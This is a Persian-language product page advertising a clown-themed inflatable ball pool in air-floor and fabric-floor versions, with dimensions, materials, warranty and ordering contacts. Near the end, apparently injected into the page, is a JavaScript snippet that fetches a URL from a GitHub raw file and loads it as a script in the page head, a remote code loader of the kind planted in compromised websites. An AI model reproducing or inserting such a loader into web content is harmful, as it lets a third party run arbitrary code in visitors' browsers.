استخر توپ دلقک – نحوه خرید و اطلاعات

استخر توپ دلقک – نحوه خرید و اطلاعات

  • استخر توپ دلقک بادی یکی از کاردستی های زیبای بادی سازان مجد که در دو نوع مختلف کف باد و کف پارچه می باشد.

    استخرتوپ بادی دلقک کف باد

    استخر توپ دلقک - نحوه خرید و اطلاعات

    سقف این استخر توپ تشکیل شده از دو ارک، پارچه و ستون های بادی می باشد، در ویوار های این دستگاه از پنجره های توری تشکیل شده است. کف این استخرتوپ بادی از ستون های بادی تشکیل شده. ابعاد و اندازه این استخر توپ بادی در طول 5 متر و عرض 4 متر و ارتفاع 4 متر می باشد وزن این دستگاه 120 کیلو گرم است. جنس این دستگاه از پارچه های کره ای و نخ ترک می باشد. چاپ این دستگاه ثابت و رنگ بندی این دستگاه طبق سفارش شما و موجودی انبار می باشد. این دستگاه شامل یک دمنده باد می باشد که قدر این دمنده 1 اسب است. این دستگاه شامل استاندارد و دو سال گارانتی می باشد.

    استخر توپ هلالی کف پارچه ای

    استخر توپ دلقک - نحوه خرید و اطلاعات

    سقف این دستگاه تشکیل شده از دو ارک، پارچه و ستون های بادی می باشد، در ویوار های این دستگاه از پنجره های توری تشکیل شده است. کف این استخرتوپ بادی تشکیل شده از پاچه. ابعاد و اندازه این استخر توپ بادی در طول 5 متر و عرض 4 متر و ارتفاع 3.5 متر می باشد وزن این دستگاه 90 کیلو گرم است. جنس این دستگاه از پارچه های کره ای و نخ ترک می باشد. چاپ این دستگاه ثابت و رنگ بندی این دستگاه طبق سفارش شما و موجودی انبار می باشد. این دستگاه شامل یک دمنده باد می باشد که قدر این دمنده 1 اسب است. این دستگاه شامل استاندارد و دو سال گارانتی می باشد.

    برای اطلاعات بیشتر

    برای خرید استخر توپ دلقک می توانید با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل نمایید. همچنین جهت خرید می توانید از طریق راه های ارتباطی تلگرام، واتساپ، ایتا و شبکه های اجتماعی دیگر درخواست خود را جهت خرید به پشتیبانی ما ارائه نمایید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید